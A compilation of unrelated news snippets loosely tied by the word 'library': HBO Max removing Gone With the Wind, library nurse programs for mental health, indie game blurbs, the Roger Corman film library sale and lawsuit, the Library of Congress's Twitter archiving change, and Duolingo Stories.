HBO Max has removed the classic film Gone With the Wind from its movie library following a number of calls to do so, in light of the ongoing global protests for racial equality. ScreenRant first reported the news, and a search of the HBO Max archives confirms that the movie is no longer available to stream. The film, released in 1939, won ten Oscars and became one of the top-earning movies of all time, and was prominently featured in HBO Max’s initial advertising push. But its romantic depiction of Civil War-era America and whitewashing of slavery is seen as problematic by many modern-day viewers, especially in light of the current social unrest regarding racism and police violence. (HBO Max has not officially commented on the reasoning behind the move.) Oscar-winning screenwriter John Ridley (12 Years a Slave) called for Gone With the Wind to be removed from HBO Max for the time being in a Los Angeles Times op-ed published this week, calling it “a film that, when it is not ignoring the horrors of slavery, pauses only to perpetuate some of the most painful stereotypes of people of color.” Others joined Ridley online in asking that the movie be shelved. HBO Max is not the only network changing its programming in light of the public outcry surrounding the protests: Paramount Network officially cancelled the police docuseries Cops after a more than three-decade run, and A&E Network has pulled new episodes of Live PD. HBO Max has also removed all guns from its new Looney Tunes Cartoons series, apparently in response to U.S. gun violence. This story is part of a series between OZY and Well Being Trust called Mental States of the Nation, where we explore ways that different states across the U.S. are enforcing and facilitating mental health parity. We think of libraries as a place to improve our minds through education and information. Now, some libraries are taking that a step further and offering mental health services, as well. Starting 2012, the Joel D. Valdez Main library, a 96,000 square-foot-facility in downtown Tucson, Arizona, has been running a public health program through the Pima County library system. Referred to as the Library Nurse Program, this was first developed to help the growing number of patrons who came to the library not only looking for resources, but also for safety and protection from the elements. Pima County’s nurse-in-the-library program has acted as a role model for many other libraries across the country, including the San Francisco Public Library and the Queens Library in New York City. Both libraries now have programs and resources in-place to help those who are struggling with mental health issues and/or are homeless. “Libraries have become the hub for communities, for resources, classes and trainings. So why not have libraries be the front line of educating people and sometimes intervening with people that have mental health or substance use needs?” says Benjamin F. Miller, chief strategy officer at Well Being Trust. “I think it’s an amazingly innovative idea that we’re now needing to go to places where people actually show up.”
The library is a safe space, a place where people can come and they don’t feel threatened. Estela Garcia, manager for the Library Nurse Program Reference librarians — or those who are responsible for providing information in response to questions posed by library users — are trained to offer neutral help. And while this type of help is great for finding a book, it’s not so useful if someone’s having a health crisis. The library nurses, on the other hand, are able to take the time to offer more in-depth conversations and medical resources, building a relationship with people in need. “It’s been really helpful for people in public with a variety of needs to have access to both kinds of relationships at the library,” says Pima County library services and branch manager, Kate DeMeester. Although the libraries don’t track mental health stats discretely, records show that the nurses in the Pima Country library system made over 1,700 referrals in 2017. These referrals included services ranging from free or low-income clinics to mental health providers to vaccination recommendations. “We have found it to be very successful; we’ve seen a marked reduction in incidents where we need to call the police,” DeMeester says. “It’s been satisfying for us to know people are more likely to get the help they need rather than just getting kicked out.” Part of the high need for mental health services at this library comes from the large homeless population in the community, which has been steadily declining since the program was announced in 2012 — the homeless population is now less than 1,400, compared to over 7,000 in 2012. The library nurses not only facilitate mental health resources, but also help find shelter, food and even keep a stash of clothing on hand. “The library is a safe space, a place where people can come and they don’t feel threatened,” says Estela Garcia, manager for the Library Nurse Program in Tucson. Having a nurse there is important, she says, to focus “on the human piece of homelessness.” The city of San Francisco also had a major homeless problem, with close to 1,000 homeless individuals visiting the SF Public Library every day. But since hiring the very first full-time, library-based psychiatric social worker back in 2009, news reports have shown that about 150 homeless people in the city have received permanent housing, and another 800 have enrolled in social and mental health services. According to Dora Barilla, group vice president for community health investment at Providence St. Joseph’s Health, these types of programs are the perfect examples of building strong community and attacking the mental health problem head on, rather than just covering it up. “Schools, hospitals and libraries are all anchor resources. We should look at them as a source of referral and wisdom in our communities, and have them be part of a health network.”

]]>Library offers a cute experience of hanging out at the library, making use of all the books by playfully tossing them at your pals. I mean, yeah, reading those books would be good too, but there’s just something about lightly hurling tomes at these grinning, playful folks that just makes you want to keep on throwing.
Library is a short, but delightfully colorful experience. You can wander the library and see who you meet inside, then hurl a couple of books their way. Even the books are smiling away in this building filled with cheerful, playful folks, encouraging you to just let loose with a little personal goofiness. After all, the mess of books will be cleaned up by digital goblins once you shut the game off. And I’m sure they’re smiling as well.
If Library doesn’t provide enough tossing fun, the game includes Morning Post, another title by developer Happy Snake. In this, you hurl mail at some smiling people while wandering around, offering you all kinds of happy places to explore and make a mess in (and not have to clean it up).
Library is available for $ 1.99 on Steam. For more information on the game and developer Happy Snake Games, you can follow them on YouTube, Itch.io, and Twitter.

As the librarian, it is your job to make sure the library is safe, so you’ll have to muster all your courage and wit to face the puzzles put forth by the paranormal presences that creep among the books.
Take control of Liz, a librarian, who must brave the darkest corners of the library she watches over as it becomes home to creatures unknown. You’ll have to keep your thinking cap on as you explore and collect items, figuring out how they will come together to forge a way forward.
Featuring the talented Octavi Navarro, a highly-praised pixel artist, players will come for the expertly crafted art style and stay for Liz’s story of deadly spectres.

The sale of the Roger Corman Library has hit a snag. Last month, word broke that Shout! Factory and Ace Films purchased 270 titles the library of legendary B-movie king Roger Corman. Now, Corman’s own sons are suing to block the sale, claiming the titles actually belong to an irrevocable trust.
I was pretty darn excited when it was announced in March that boutique Blu-ray label Shout! Factory was purchasing the rights to Roger Corman’s B-movie library, consisting of 270 movies with titles like Rock‘N’Roll High School, Battle Beyond the Stars, Piranha, Galaxy of Terror, Bloodfist, Black Scorpion, Eat My Dust!, Humanoids from the Deep, Slumber Party Massacre, and Forbidden World.
My excitement may have been premature. Variety reports that Corman’s sons, Roger M. Corman and Brian Corman, are suing to halt the sale. Here’s how Variety breaks down all the legalese of the lawsuit:
The two Corman sons — Roger M. and Brian — allege that their mother has worked for more than 10 years to undermine their father’s estate plan, which was established to minimize tax liabilities. They contend that Roger, who is 91, and Julie have ignored their obligations to the trust set up for the children’s benefit. Last fall, the sons filed a suit alleging that their parents were paying below-market rent to live in a mansion owned by the trust.
“You can’t sell what you don’t own,” said Alex Weingarten, attorney for the Corman sons. “It’s unfortunate that we keep having to go back over and over again to force Roger and Julie to undo what they have done.”
Obviously, this puts a damper on the whole deal. Shout! Factory had planned to both re-distribute Corman’s films on Blu-ray and also use the library to develop new content, including remakes, merchandise and more. Now, all that is up in the air. The Corman sons want to halt the sale entirely, while also seeking punitive damages.
It seems like this whole scenario could’ve been avoided if Roger and wife Julie Corman had sat down and had a discussion about all of this with their sons, but, here we are. When the sale was announced, Roger and Julie Corman issued the following statement:
“During the past decade our personal and professional relationships with Shout! Factory’s Bob Emmer, Richard and Garson Foos, and Ace Film’s Henry Luk and Adam Yuchen Ren have shown us that their independent, entrepreneurial spirit, respect for our work and creative methods of distribution and production make them especially well-suited to carry on with the New Horizons film library.”
From a purely selfish reason, I’d like the sale to go through, just because I’d love to get my hands on new Blu-ray releases of Corman’s B-movie library. I’m sure the Corman sons feel much differently, though.

Shout! Factory has snapped up the rights to 270 films from B-movie master Roger Corman. This deal will enable Shout! Factory to not only redistribute the films on Blu-ray, but also reboot certain titles into new films. Time for the million dollar Slumber Party Massacre reboot! More on the Shout! Factory Roger Corman Library deal below.
Roger Corman is a legend. He’s produced over 350 films and directed 60 others, and spent his career giving young talent their first big break in filmmaking. Jack Nicholson, Francis Ford Coppola, Robert De Niro, Martin Scorsese, James Cameron, Ron Howard, Peter Fonda, Jonathan Demme, Gale Anne Hurd, Joe Dante, and many more all got their starts at Corman’s B-movie school. Corman’s films were shot fast and cheap, yet their influence on the world of movies is immeasurable.
Now, Corman’s New Horizons Picture Film Library has found a new home with home video company Shout! Factory. Shout and China-based Ace Film HK Company Limited (ACE) have purchased Corman’s library, which encompasses 270 films an action sci-fi TV series. The deal grants Shout! Factory all rights to library, which includes films like Rock‘N’Roll High School, Battle Beyond the Stars, Piranha, Galaxy of Terror, Bloodfist, Black Scorpion, Eat My Dust!, Humanoids from the Deep, Slumber Party Massacre, and Forbidden World.
Shout! Factory has made a name for themselves with boutique Blu-ray releases of cult classics as well as horror films through their off-shoot Scream! Factory. This is a great deal for Shout, because it gives them the opportunity to redistribute Corman’s library on Blu-ray. But Shout is also trying to grow their brand beyond home video, and this deal will benefit that as well. Per the press release for the deal, Shout! Factory plans to also use the library to develop new content, including remakes, merchandise and more. Some of Corman’s properties have already been remade – Piranha, for example. But there are numerous titles that would be ripe for remake as well – although I doubt any expensive remake will have the B-movie charm of the original.
Shout! Factory issued the following statement about the deal:
“We’ve been huge fans of the Cormans. Their great ingenuity and independent spirit have inspired us throughout our careers. We’ve loved working with them over the last 8 years and are thrilled to now be the custodians of these beloved films, making sure that film buffs and fans everywhere discover them like we did.”
Roger and Julie Corman issued a statement of their own:
“During the past decade our personal and professional relationships with Shout! Factory’s Bob Emmer, Richard and Garson Foos, and Ace Film’s Henry Luk and Adam Yuchen Ren have shown us that their independent, entrepreneurial spirit, respect for our work and creative methods of distribution and production make them especially well-suited to carry on with the New Horizons film library.”
As a Corman fan, I’m very excited about this. I don’t know how I feel about the remake concept, but the idea of having Corman’s library redistributed on Blu-ray via Shout! Factory is like a dream come true. (Yes, I’m one of those weirdos who still buys physical media. Speaking of which, read my latest Blu-ray column here!)
If you’re looking for more info on Corman and his career, I highly recommend the in-depth interview he did with filmmaker Mick Garris. Check it out below.

Yesterday, the US Library of Congress announced a change to its social media archiving policy. In 2010, the LOC had been given a complete archive of every tweet sent to that point; it has been grabbing every single new one since. But starting on the first of January, the archiving will become selective; only tweets that are deemed newsworthy will be kept.
The LOC describes the decision in a very short white paper. Part of the reasoning is the sheer volume of data; the number of tweets is up, and their possible length has been doubled recently. But it’s also a matter of being able to actually preserve content. Tweets now embed pictures, videos, and previews of the content of any links they contain. The LOC has been preserving only text and, therefore, is missing out on an increasingly important portion of the information content of any tweet.
In addition, the Library’s normal role is as a curator, preserving information that’s thought to be most significant or valuable. In this sense, the change will bring its Twitter policy more in line with its general approach to collecting.
]]>
It doesn’t seem odd anymore that governments might want to save Twitter archives for historical purposes, what with all the attention our president gets for his contributions to the platform. The UK has been saving tweets and YouTube videos as historic media since 2014, while our own Library of Congress made it a practice since 2010. Now, however, the folks who manage the Twitter archive at the Library of Congress have announced that as of January 1st, they will only save tweets “on a selective basis.”
According to a blog post by Gayle Osterberg of the Library of Congress, the program will maintain the archive of tweets from 2006 – 2010, and will continue to acquire tweets on a selective basis. A white paper on the change says that, in general, tweets archived will be “thematic and event-based, including events such as elections, of themes of ongoing national interest, e.g. public policy.”
The white paper also points out that the volume of tweets has increased dramatically over time since 2010, and that its text-only archives miss important visual information of recent tweets. The Library feels that the first 12 years of tweets represent the rise of an important social media, and that the full-text collection can now be limited. “The Library generally does not collect comprehensively,” says the white paper. “Given the unknown direction of social media when the gift was first planned, the Library made an exception for public tweets. With social media now established, the Library is bringing its collecting practice more in line with its collection policies.”

Six months ago, language learning service Duolingo introduced new mini-morsels of content called Stories. They walked users through short tales that would ideally be more organic than scripted conversations. Today, the service announced it’s expanded beyond Spanish and Portuguese by adding 20 Stories each in French and German.
Duolingo launched Stories as an experiment, as its team points out in an August update, so they aren’t sure when (or if) they’ll add more languages. Expanding up to four is a good sign, though, and shows promise for the service’s experiments beyond typical lessons. Earlier this month, Duolingo launched a podcast focusing on Spanish-language non-fiction stories, which can be found on iTunes, Google Play Music, Spotify and elsewhere. Stories remain on the Duolingo site, but as it’s still in beta, they don’t add XP for participating — they’re just for your own learning pleasure.
